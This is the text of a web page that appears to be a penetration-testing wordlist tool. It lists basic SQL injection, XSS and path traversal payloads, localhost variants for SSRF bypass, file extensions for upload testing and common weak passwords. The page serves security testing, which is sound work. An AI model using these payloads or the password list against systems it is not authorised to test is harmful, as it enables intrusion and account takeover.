Payload Box Search Wordlists HTTP Headers Copy All Common HTTP request/response headers Accept Accept-Encoding Accept-Language Authorization Cache-Control Connection Content-Length Content-Type Cookie Host Origin Referer User-Agent X-Forwarded-For X-Forwarded-Host X-Forwarded-Proto X-Real-IP X-Requested-With Localhost Variations Copy All Localhost and loopback variations for SSRF/bypass 127.0.0.1 localhost 0.0.0.0 [::1] [::ffff:127.0.0.1] [0:0:0:0:0:0:0:1] [0000:0000:0000:0000:0000:0000:0000:0001] 0x7f.0x0.0x0.0x1 0177.0000.0000.0001 2130706433 127.1 127.0.1 0x7f000001 017700000001 File Extensions Copy All Common file extensions for testing php php3 php4 php5 php7 phtml phar asp aspx jsp jspx html htm js json xml txt pdf zip tar gz bak old tmp log conf config ini sql db sqlite Lowercase (a-z) Copy All Lowercase alphabet characters a b c d e f g h i j k l m n o p q r s t u v w x y z Uppercase (A-Z) Copy All Uppercase alphabet characters A B C D E F G H I J K L M N O P Q R S T U V W X Y Z Numbers (0-9) Copy All Single digit numbers 0 1 2 3 4 5 6 7 8 9 ASCII Printable Characters Copy All All printable ASCII characters ! " # $ % & ' ( ) * + , - . / : ; < = > ? @ [ \ ] ^ _ ` { | } ~ SQL Injection Copy All Basic SQL injection test payloads ' " ' OR '1'='1 " OR "1"="1 ' OR 1=1-- " OR 1=1-- ' OR 1=1# " OR 1=1# admin'-- admin"-- ' UNION SELECT NULL-- " UNION SELECT NULL-- ' AND 1=1-- " AND 1=1-- ' AND 1=2-- " AND 1=2-- XSS Payloads Copy All Basic XSS test payloads <script>alert(1)</script> <img src=x onerror=alert(1)> <svg/onload=alert(1)> <iframe src=javascript:alert(1)> <body onload=alert(1)> <input onfocus=alert(1) autofocus> <marquee onstart=alert(1)> <div onmouseover=alert(1)>test</div> <a href="javascript:alert(1)">click</a> <svg><script>alert(1)</script></svg> ';alert(1);// ";alert(1);// javascript:alert(1) <ScRiPt>alert(1)</sCrIpT> <IMG SRC="javascript:alert(1)"> Path Traversal Copy All Path traversal patterns ../ ../../ ../../../ ../../../../ ../../../../../ ../../../../../../ ../../../../../../../ ../../../../../../../../ ..%2f ..%252f %2e%2e/ %2e%2e%2f ..%5c ..%255c %2e%2e\ %2e%2e%5c Common Passwords Copy All Most common weak passwords password 123456 12345678 qwerty abc123 admin letmein welcome monkey 1234567890 password1 Password1 admin123 root toor guest test demo user changeme HTTP Methods Copy All HTTP request methods GET POST PUT DELETE PATCH HEAD OPTIONS CONNECT TRACE TRACK PROPFIND PROPPATCH MKCOL COPY MOVE LOCK UNLOCK
